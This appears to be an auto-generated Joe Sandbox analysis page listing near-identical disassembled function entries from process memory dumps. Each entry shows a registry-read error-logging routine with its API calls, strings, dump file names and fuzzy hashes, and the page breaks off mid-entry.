Instruction ID: 3e37d70ca1d49b4bdb7872e231e9f2b744e931e5fcd53ca7f008a8d14ed0d1c8
Opcode Fuzzy Hash: 73bf8a35bb48351cd0d25f1bb76652707aface3227f603294c8b4d980d48cf6f
Instruction Fuzzy Hash: 37F0966260D60642E5768F04BC403B56354AF547A5F480136DDCD467B4FF3EEA859B00

Function 00007FFE0EC0991D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EC099CD

Part of subcall function 00007FFE0EC02FD2: fwrite.MSVCRT ref: 00007FFE0EC0307E
Part of subcall function 00007FFE0EC02FD2: fflush.MSVCRT ref: 00007FFE0EC0308A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EC09A1D
registry_get_value, xrefs: 00007FFE0EC09A16

Memory Dump Source

Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true

Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 1f8b6be4531e4f61a9b791164e86e5d65f11346d678c3961dc24315970669e59
Instruction ID: 85c73d4dd8fb205b9f740cc15953a342ff1463d59d1dbeeeb47ea44b08f4990e
Opcode Fuzzy Hash: 1f8b6be4531e4f61a9b791164e86e5d65f11346d678c3961dc24315970669e59
Instruction Fuzzy Hash: CDF0BB6270878A62E5628F44F8C03B96254FFC67A4F480235EDCD466F2EF3ED9859302

Function 00007FFE0EC09927 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EC099CD

Part of subcall function 00007FFE0EC02FD2: fwrite.MSVCRT ref: 00007FFE0EC0307E
Part of subcall function 00007FFE0EC02FD2: fflush.MSVCRT ref: 00007FFE0EC0308A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EC09A1D
registry_get_value, xrefs: 00007FFE0EC09A16

Memory Dump Source

Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true

Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 5e972d20f0db2410af95bb835652d4743476dec15b4255502ad73526abce4442
Instruction ID: 4faf6d9bd7dcec9f53a93613842189fd9f9e885b68372aa37d8a083ea913296a
Opcode Fuzzy Hash: 5e972d20f0db2410af95bb835652d4743476dec15b4255502ad73526abce4442
Instruction Fuzzy Hash: E9F0BB6260868662E5628F44FCC03B96254FFC67A4F480235EDCD466F1EF3ED9899301

Function 00007FFE0EC09A38 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EC099CD

Part of subcall function 00007FFE0EC02FD2: fwrite.MSVCRT ref: 00007FFE0EC0307E
Part of subcall function 00007FFE0EC02FD2: fflush.MSVCRT ref: 00007FFE0EC0308A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EC09A1D
registry_get_value, xrefs: 00007FFE0EC09A16

Memory Dump Source

Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true

Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: e0851725d79fa95748260dbe6cd32e6c1aaac29318307fe0d0a66a5108b9946e
Instruction ID: c633060daa4c9abe3e84b457e38c13a3d1e2407361f930bc72ea1884ce74e30f
Opcode Fuzzy Hash: e0851725d79fa95748260dbe6cd32e6c1aaac29318307fe0d0a66a5108b9946e
Instruction Fuzzy Hash: 6FF0BB6260878662E5628F44F8C03B96254FFC57A4F480235EDCD466F1EF3ED9899302

Function 00007FFE0EC099AE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EC099CD

Part of subcall function 00007FFE0EC02FD2: fwrite.MSVCRT ref: 00007FFE0EC0307E
Part of subcall function 00007FFE0EC02FD2: fflush.MSVCRT ref: 00007FFE0EC0308A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EC09A1D
registry_get_value, xrefs: 00007FFE0EC09A16

Memory Dump Source

Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true

Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 43db66ee65da957a1449361e24969b174e734d57be6334d49a96190eb8423e72
Instruction ID: 46fd059dadb52b5eec2fb6b563bfa6a917d9169ad0ea29795ff77f7e7a7fd8cf
Opcode Fuzzy Hash: 43db66ee65da957a1449361e24969b174e734d57be6334d49a96190eb8423e72
Instruction Fuzzy Hash: D6F0BB6260878662E5628F44FCC03B96258FFC67A4F480236EDCD466F1EF3ED9859302

Function 00007FFE0EC099BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EC099CD

Part of subcall function 00007FFE0EC02FD2: fwrite.MSVCRT ref: 00007FFE0EC0307E
Part of subcall function 00007FFE0EC02FD2: fflush.MSVCRT ref: 00007FFE0EC0308A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EC09A1D
registry_get_value, xrefs: 00007FFE0EC09A16

Memory Dump Source

Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true

Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: be87ca2da0906a4b563e4e802efae5fe8a631e34ae087ba0a1cce180adca3898
Instruction ID: 93bd4c77cd10613a2b95c17216154410be8737cc1a0adb06f5fae28ac460e17d
Opcode Fuzzy Hash: be87ca2da0906a4b563e4e802efae5fe8a631e34ae087ba0a1cce180adca3898
Instruction Fuzzy Hash: B7F0BB6260878662E5628F44F8C03B96254FFC67A4F480236EDCD466F1EF3ED9859702

Function 00007FFE0E16B2FD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0E16B3AD

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

Strings

registry_get_value, xrefs: 00007FFE0E16B3F6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E16B3FD

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 1726078345292218ae6fca3387da9e0b278bbc608f39be5f3a5ef1151e4d23a0
Instruction ID: 86ce30af62eefcd1e362b89dd4a3caa6e9a74b2ee184367626b2dbb0807cdfa8
Opcode Fuzzy Hash: 1726078345292218ae6fca3387da9e0b278bbc608f39be5f3a5ef1151e4d23a0
Instruction Fuzzy Hash: 6EF06DA2A0C75B82E5529F10F8447BA6254AF447A8F48023BDD9D866B2EF2CD9899300

Function 00007FFE0E16B307 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0E16B3AD

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

Strings

registry_get_value, xrefs: 00007FFE0E16B3F6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E16B3FD

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: b037b6fe6f67dfd604fa9fd6ca3b6c35f87ca430a8ddf23a29a78834e700ff42
Instruction ID: 1a299213a822cc5f253556a3a435b4da673161fc3fbd51081930cf426b5c8ecc
Opcode Fuzzy Hash: b037b6fe6f67dfd604fa9fd6ca3b6c35f87ca430a8ddf23a29a78834e700ff42
Instruction Fuzzy Hash: 34F090A2A0C75B82E5529F10F8447BA6254FF447E8F48023BDDDD876B1EF2CD9899300

Function 00007FFE0E16B38E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0E16B3AD

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

Strings

registry_get_value, xrefs: 00007FFE0E16B3F6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E16B3FD

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: d6ff838a34e7d2476074e47ccabdb3b9f61c6b2b69fb8e677531412b271319d3
Instruction ID: 2f7950778ae422de24e56455a1765d966b00fb18ad4645a8d2ceac97e60131d9
Opcode Fuzzy Hash: d6ff838a34e7d2476074e47ccabdb3b9f61c6b2b69fb8e677531412b271319d3
Instruction Fuzzy Hash: 56F090A2A0C75B82E5529F10F8447BA6254FF447E8F48023BDDDD876B1EF2CD9899300

Function 00007FFE0E16B39C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0E16B3AD

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

Strings

registry_get_value, xrefs: 00007FFE0E16B3F6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E16B3FD

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 7f4bb2757c6429af5118dbfa1ec4bb69a9b171593b6e8716668abd9c92b91476
Instruction ID: 0e92d6aa44722bc36fcf251fd76824ec65a13b4387d5e34c320950e713e27049
Opcode Fuzzy Hash: 7f4bb2757c6429af5118dbfa1ec4bb69a9b171593b6e8716668abd9c92b91476
Instruction Fuzzy Hash: 1BF090A2A0C75B82E5529F10F8447BA6254FF447E8F48023BDDDD876B1EF2CD9899700

Function 00007FFE0E16B418 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0E16B3AD

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

Strings

registry_get_value, xrefs: 00007FFE0E16B3F6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E16B3FD

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: bda0a4a6d43b740aecd7a68f54ee1cef6273edae9aa568f0334e52d24c909ae7
Instruction ID: dd454f8397a2f4b4e64eb1f64dba90335dafc04b0a8137ec97555e6c13e4577c
Opcode Fuzzy Hash: bda0a4a6d43b740aecd7a68f54ee1cef6273edae9aa568f0334e52d24c909ae7
Instruction Fuzzy Hash: 30F090A2A0C75B82E6529F10F8447BA6254FF447E8F084237DDDD876B1EF2CD9899300

Function 00007FF6BFD658BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF6BFD658CD

Part of subcall function 00007FF6BFD699E2: fwrite.MSVCRT ref: 00007FF6BFD69A8E
Part of subcall function 00007FF6BFD699E2: fflush.MSVCRT ref: 00007FF6BFD69A9A

Strings

registry_get_value, xrefs: 00007FF6BFD65916
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF6BFD6591D

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 2421130e589a518d8d6a899e34f192d6eae1fdef6248c36e69ef4aa482b17227
Instruction ID: 0a1cb23a89c6eccfd8248f48028f52706b0cd93caf7c881a3af3e3a2321808a9
Opcode Fuzzy Hash: 2421130e589a518d8d6a899e34f192d6eae1fdef6248c36e69ef4aa482b17227
Instruction Fuzzy Hash: 23F06262A0874652E5529F88B8803797354EF40795F480336EE5DCAAA0DF2DE9C99780

Function 00007FF6BFD658AE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF6BFD658CD

Part of subcall function 00007FF6BFD699E2: fwrite.MSVCRT ref: 00007FF6BFD69A8E
Part of subcall function 00007FF6BFD699E2: fflush.MSVCRT ref: 00007FF6BFD69A9A

Strings

registry_get_value, xrefs: 00007FF6BFD65916
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF6BFD6591D

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 26abaf404a186cce4437ed2da7a72a2f3e0e06abd906e563cf0bcb7fe33f66ef
Instruction ID: 972090fdc100d06f01bda456361739ee713a832b9ccd39a4697aafc4fa87efc4
Opcode Fuzzy Hash: 26abaf404a186cce4437ed2da7a72a2f3e0e06abd906e563cf0bcb7fe33f66ef
Instruction Fuzzy Hash: E3F06262A0874652E5529F88B8803797354EF40795F480336EE5D8A6A0DF2DE9C99780

Function 00007FF6BFD6581D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF6BFD658CD

Part of subcall function 00007FF6BFD699E2: fwrite.MSVCRT ref: 00007FF6BFD69A8E
Part of subcall function 00007FF6BFD699E2: fflush.MSVCRT ref: 00007FF6BFD69A9A

Strings

registry_get_value, xrefs: 00007FF6BFD65916
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF6BFD6591D

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 0879c6a44524d8b251e147b057380ee73abba84e16f301a98f496365444c6721
Instruction ID: 12c861db2c6e2faf6c27d4cd2576df9c8edc95733573d16c4334fc2fb7d1b154
Opcode Fuzzy Hash: 0879c6a44524d8b251e147b057380ee73abba84e16f301a98f496365444c6721
Instruction Fuzzy Hash: 68F06262A0874652E5529F88B8803797354EF40795F480336EE5D8A6A1DF2DE9C99780

Function 00007FF6BFD65827 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF6BFD658CD

Part of subcall function 00007FF6BFD699E2: fwrite.MSVCRT ref: 00007FF6BFD69A8E
Part of subcall function 00007FF6BFD699E2: fflush.MSVCRT ref: 00007FF6BFD69A9A

Strings

registry_get_value, xrefs: 00007FF6BFD65916
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF6BFD6591D

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: c0cddd2865619a54ec6232293f106fb97064ae862a9b86bbce8474b1505a66a2
Instruction ID: 1af30345f51afb651f545caf6c92e7dc0301563f9395d655c52f103e206d5e01
Opcode Fuzzy Hash: c0cddd2865619a54ec6232293f106fb97064ae862a9b86bbce8474b1505a66a2
Instruction Fuzzy Hash: 1AF06262A0874652E5529F88B8803797354EF40795F480336EE5D8A6A0DF2DE9C99780

Function 00007FF6BFD65938 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF6BFD658CD

Part of subcall function 00007FF6BFD699E2: fwrite.MSVCRT ref: 00007FF6BFD69A8E
Part of subcall function 00007FF6BFD699E2: fflush.MSVCRT ref: 00007FF6BFD69A9A

Strings

registry_get_value, xrefs: 00007FF6BFD65916
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF6BFD6591D

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 0ea0f9f3e0855ebec4d02b887b4cf1966552980e8b767d39c0e2875b2443d339
